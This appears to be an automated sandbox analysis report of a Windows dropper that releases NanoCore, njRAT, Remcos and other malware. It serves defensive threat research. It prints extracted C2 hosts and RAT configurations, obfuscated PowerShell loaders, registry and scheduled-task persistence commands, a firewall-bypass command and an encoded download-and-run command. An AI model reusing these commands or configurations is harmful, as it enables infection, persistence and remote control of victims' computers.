Analysis

  • max time kernel
    11s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-09-2024 03:57

Errors

Reason
Machine shutdown

General

  • Target

    driverupdate_report_windows_10_22h2.txt.exe

  • Size

    13.8MB

  • MD5

    8360a6245b4ae84a5b6e4784d7802472

  • SHA1

    192f6d4a68ec867c5919a5d5fd4c782bf9c39127

  • SHA256

    393732bdd7df3cbbcc35dca3397178466f32de8ebd266ad5791c000288771bc5

  • SHA512

    38b4630ab40c84f822fe860038c4c48d0ea31ceaa23d05d01f599c08f44a3fe45113f4386f1874799dfb15e7d7930c369c2eeba11129adfa3f9154264cbcc63b

  • SSDEEP

    49152:M3QhanbDdeZ6Hfa/nkNQzlJ7r5oP3TXyymMknH76EAaIilSH7YNjMn80iA+cpUGN:Mn

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

C2

hiatus2.ddns.net:1604

127.0.0.1:1604

Mutex

e7e30201-c342-4921-abc6-2182083982ff

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    127.0.0.1

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2024-05-31T20:09:09.303717636Z

  • bypass_user_account_control

    true

  • bypass_user_account_control_data

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    1604

  • default_group

    Default

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    e7e30201-c342-4921-abc6-2182083982ff

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    hiatus2.ddns.net

  • primary_dns_server

    8.8.8.8

  • request_elevation

    true

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    true

  • set_critical_process

    true

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

C2

192.168.1.42:5552

Mutex

bf7b1fe7a7644171a9985ea45221c25c

Attributes
  • reg_key

    bf7b1fe7a7644171a9985ea45221c25c

  • splitter

    |'|'|

Extracted

Family

remcos

Botnet

AUGUST CRYPTER TOOLZ GRACE STUB

C2

teamfavour222.ddns.net :6767

odogwuvisual123.duckdns.org:6767

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    -YFLE4M

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Extracted

Family

remcos

Botnet

Sup

C2

deadyh2849ijest.duckdns.org:8347

deadyh2849ijest.duckdns.org:37830

highestlotto.duckdns.org:37830

highestlotto.duckdns.org:8347

highest1lotto1.duckdns.org:8347

highest1lotto1.duckdns.org:37830

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    lairup.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    gbopertj-7FGJEG

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 20 IoCs
  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\driverupdate_report_windows_10_22h2.txt.exe
    "C:\Users\Admin\AppData\Local\Temp\driverupdate_report_windows_10_22h2.txt.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3864
    • C:\Users\Admin\AppData\Local\Temp\7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
      "C:\Users\Admin\AppData\Local\Temp\7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      PID:1640
    • C:\Users\Admin\AppData\Local\Temp\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
      "C:\Users\Admin\AppData\Local\Temp\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3800
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        "Powershell.exe" -windowstyle minimized "$Teratism249 = Get-Content 'C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168' ; $Neglefilen=$Teratism249.SubString(69482,3);.$Neglefilen($Teratism249) "
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:452
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          4⤵
            PID:2680
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Archcharlatan" /t REG_EXPAND_SZ /d "%Gibblegabbler52% -windowstyle minimized $Loveability=(Get-ItemProperty -Path 'HKCU:\Torturredskabet\').Vandskien;%Gibblegabbler52% ($Loveability)"
              5⤵
                PID:4832
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Archcharlatan" /t REG_EXPAND_SZ /d "%Gibblegabbler52% -windowstyle minimized $Loveability=(Get-ItemProperty -Path 'HKCU:\Torturredskabet\').Vandskien;%Gibblegabbler52% ($Loveability)"
                  6⤵
                  • Modifies registry key
                  PID:2688
        • C:\Users\Admin\AppData\Local\Temp\BlueScreen.exe
          "C:\Users\Admin\AppData\Local\Temp\BlueScreen.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1560
        • C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe
          "C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4204
          • C:\Users\Admin\AppData\Local\Temp\~DeAE8F.tmp
            C:\Users\Admin\AppData\Local\Temp\~DeAE8F.tmp _$PID:308 _$EXE:C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe _$CMDLINE:
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4304
            • C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe
              C:\Users\Admin\AppData\Local\Temp\\CirnoBackdoorLOL.exe
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              PID:1336
            • C:\Users\Admin\AppData\Local\Temp\javawvd.exe
              C:\Users\Admin\AppData\Local\Temp\javawvd.exe
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:4252
        • C:\Users\Admin\AppData\Local\Temp\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
          "C:\Users\Admin\AppData\Local\Temp\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4704
        • C:\Users\Admin\AppData\Local\Temp\cleansaturn.exe
          "C:\Users\Admin\AppData\Local\Temp\cleansaturn.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:3004
        • C:\Users\Admin\AppData\Local\Temp\error.exe
          "C:\Users\Admin\AppData\Local\Temp\error.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1492
        • C:\Users\Admin\AppData\Local\Temp\concos_1.6.exe
          "C:\Users\Admin\AppData\Local\Temp\concos_1.6.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1444
        • C:\Users\Admin\AppData\Local\Temp\colorful screen darkener.exe
          "C:\Users\Admin\AppData\Local\Temp\colorful screen darkener.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3128
        • C:\Users\Admin\AppData\Local\Temp\Client.exe
          "C:\Users\Admin\AppData\Local\Temp\Client.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1752
          • C:\Windows\SYSTEM32\CMD.exe
            "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit
            3⤵
              PID:5008
              • C:\Windows\system32\schtasks.exe
                SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"
                4⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1264
            • C:\Windows\SYSTEM32\CMD.exe
              "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
              3⤵
                PID:3460
                • C:\Windows\system32\schtasks.exe
                  SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
                  4⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1312
              • C:\Windows\SYSTEM32\CMD.exe
                "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
                3⤵
                  PID:1140
                  • C:\Windows\system32\schtasks.exe
                    SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
                    4⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2452
              • C:\Users\Admin\AppData\Local\Temp\levislocker.exe
                "C:\Users\Admin\AppData\Local\Temp\levislocker.exe"
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2516
              • C:\Users\Admin\AppData\Local\Temp\malecus.exe
                "C:\Users\Admin\AppData\Local\Temp\malecus.exe"
                2⤵
                • Executes dropped EXE
                • Writes to the Master Boot Record (MBR)
                • System Location Discovery: System Language Discovery
                PID:1992
              • C:\Users\Admin\AppData\Local\Temp\evil.exe
                "C:\Users\Admin\AppData\Local\Temp\evil.exe"
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:636
                • C:\Windows\SysWOW64\netsh.exe
                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\evil.exe" "evil.exe" ENABLE
                  3⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:5076
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    4⤵
                      PID:4204
                • C:\Users\Admin\AppData\Local\Temp\Solaris.exe
                  "C:\Users\Admin\AppData\Local\Temp\Solaris.exe"
                  2⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2988
                • C:\Users\Admin\AppData\Local\Temp\TEST.exe
                  "C:\Users\Admin\AppData\Local\Temp\TEST.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4772
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1D57.tmp.bat""
                    3⤵
                      PID:2568
                      • C:\Windows\system32\timeout.exe
                        timeout 3
                        4⤵
                        • Delays execution with timeout.exe
                        PID:396
                      • C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe
                        "C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe"
                        4⤵
                          PID:1808
                    • C:\Users\Admin\AppData\Local\Temp\ss.exe
                      "C:\Users\Admin\AppData\Local\Temp\ss.exe"
                      2⤵
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2292
                    • C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe
                      "C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe"
                      2⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:1548
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAYQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQBqAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBzAHcAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAHAAZABiACcALAAgADwAIwB4AG4AaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAZgB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAdQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFkAbwB1AHQAdQBiAGUALQBWAGkAZQB3AGUAcgBzAC4AcABkAGIAJwApACkAPAAjAGYAdABsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAHgAbQBsACcALAAgADwAIwBhAGsAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAagBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAegBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AeABtAGwAJwApACkAPAAjAHEAYwByACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAGQAbABsACcALAAgADwAIwB2AHgAdgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAZQBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAdQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AZABsAGwAJwApACkAPAAjAGEAaABiACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlAC4AYwBvAG4AZgBpAGcAJwAsACAAPAAjAGoAZgB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwBhAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBwAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAuAGMAbwBuAGYAaQBnACcAKQApADwAIwB0AHoAYwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwBsAC8AWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACwAIAA8ACMAZQBrAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHMAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AGgAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlACcAKQApADwAIwBxAGYAaQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcALAAgADwAIwBmAHQAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHAAdgB5ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGQAYQBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwApACkAPAAjAHEAYgB4ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAC8AVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACwAIAA8ACMAcQB0AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAGUAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAG4AcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQApADwAIwBjAHQAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB5AGIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgB4AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACkAPAAjAHoAegBjACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAdAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAHYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAZwBjAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegB5AHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAeAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwApADwAIwBnAHUAZwAjAD4A"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3916
                        • C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe
                          "C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe"
                          4⤵
                            PID:5032
                          • C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe
                            "C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe"
                            4⤵
                              PID:4508
                            • C:\Users\Admin\AppData\Roaming\VC_redistx64.exe
                              "C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"
                              4⤵
                                PID:3336

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Filesize

                          53KB

                          MD5

                          0b7df220ea6d6199a01fe10553f4d2f4

                          SHA1

                          b139f1dc3caf61f16d3d01827705640293472412

                          SHA256

                          5c816244576ce342174cdd31aa08bfcb19f14e4d170089812ab385a9fbee0cd9

                          SHA512

                          79ebeb0a3a77acea6d0904269673b7485d4895077c513cbda70f0b5afba5e19194549f8cc1ed920e33383b0ac81b85b7caa662cff50b2aa74babf1f6b659f4ef

                        • C:\Users\Admin\AppData\Local\Temp\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe

                          Filesize

                          233KB

                          MD5

                          4ef3177a2e94ce3d15ae9490a73a2212

                          SHA1

                          a34f47568ce7fcea97a002eebeae385efa98790c

                          SHA256

                          87353d18dfdebf4d0747bbf21d58adaed2b04060d61cba3fa052d522640520f0

                          SHA512

                          635ce5c0d1b9f7dd5d7b4c00f216af06dc7d818132ba87a57d3d54f6b30ee01f64430d2aa265f60027cc58dc2e738d5b674ee36ffdca34ff540ce44b7da7c502

                        • C:\Users\Admin\AppData\Local\Temp\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe

                          Filesize

                          568KB

                          MD5

                          4448a3c2ddfdda45009b440faa39a5fe

                          SHA1

                          b16a26331d6ebe8f4a45b43e8b0251a715139b10

                          SHA256

                          70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2

                          SHA512

                          094cef6184c29430be5e4536b54cdfa632b52e7e09c7a4c04104d1b533113f6de6190d6525aac84ddba631220ee0b33a047272b952765977df336a5fa72425b0

                        • C:\Users\Admin\AppData\Local\Temp\7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe

                          Filesize

                          65KB

                          MD5

                          694efccf0c905305f5c8418499fe335c

                          SHA1

                          1fa42976df8d8b1848ac2d99468da3c17785d285

                          SHA256

                          7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b

                          SHA512

                          294fecfb3abb91a9a61001b26acced7a1cc99abb0a140a8bc352b51794e3750b7579b44543d1afde676c0e75ddc6c80c44eb49b959946654bc5f88e0d2b49fcb

                        • C:\Users\Admin\AppData\Local\Temp\BlueScreen.exe

                          Filesize

                          9KB

                          MD5

                          b01ee228c4a61a5c06b01160790f9f7c

                          SHA1

                          e7cc238b6767401f6e3018d3f0acfe6d207450f8

                          SHA256

                          14e6ac84d824c0cf6ea8ebb5b3be10f8893449474096e59ff0fd878d49d0c160

                          SHA512

                          c849231c19590e61fbf15847af5062f817247f2bcd476700f1e1fa52dcafa5f0417cc01906b44c890be8cef9347e3c8f6b1594d750b1cebdd6a71256fed79140

                        • C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe

                          Filesize

                          1.6MB

                          MD5

                          a42d640eb78c5d5b867abef05e5231d6

                          SHA1

                          0b1068a2b47798feb89b917ff4297ab0328c4296

                          SHA256

                          73d8301c93c887eedd6777610a37a2b7484ab6b2555b19d241480483324b1952

                          SHA512

                          21c3c444db9c20d2faabee48040e06cfb2ff2941151b1a4e004a0e02c48b9fe8de69b0072365395d0bc65433f126e1fb20c10e7d1526192c281c377011f07ae8

                        • C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe

                          Filesize

                          1.8MB

                          MD5

                          55677d2f4f251b558660652002933369

                          SHA1

                          804357acd8e75f6a8db9b907a8df882e8588b6bd

                          SHA256

                          f714fb12a601649f1e0840a75265337c77683ec64a599f0631d2ba512bcee5f5

                          SHA512

